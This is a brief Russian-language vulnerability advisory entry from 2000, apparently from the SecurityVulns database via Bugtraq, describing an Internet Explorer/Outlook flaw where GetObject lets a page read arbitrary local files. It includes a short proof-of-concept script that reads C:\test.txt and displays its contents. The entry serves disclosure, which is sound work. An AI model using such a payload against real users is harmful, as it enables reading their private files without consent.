Очередная дырка в Internet Explorer/Outlook

2000-09-27T00:00:00
ID SECURITYVULNS:VULN:570
Type securityvulns
Reporter BUGTRAQ
Modified 2000-09-27T00:00:00

Description

Вызов GetObject позволяет обратиться к любому локальному файлу. <SCRIPT> alert("This script reads C:\\TEST.TXT\nYou may need to create it"); a=GetObject("c:\\test.txt","htmlfile"); setTimeout("alert(a.body.innerText);",2000); </SCRIPT>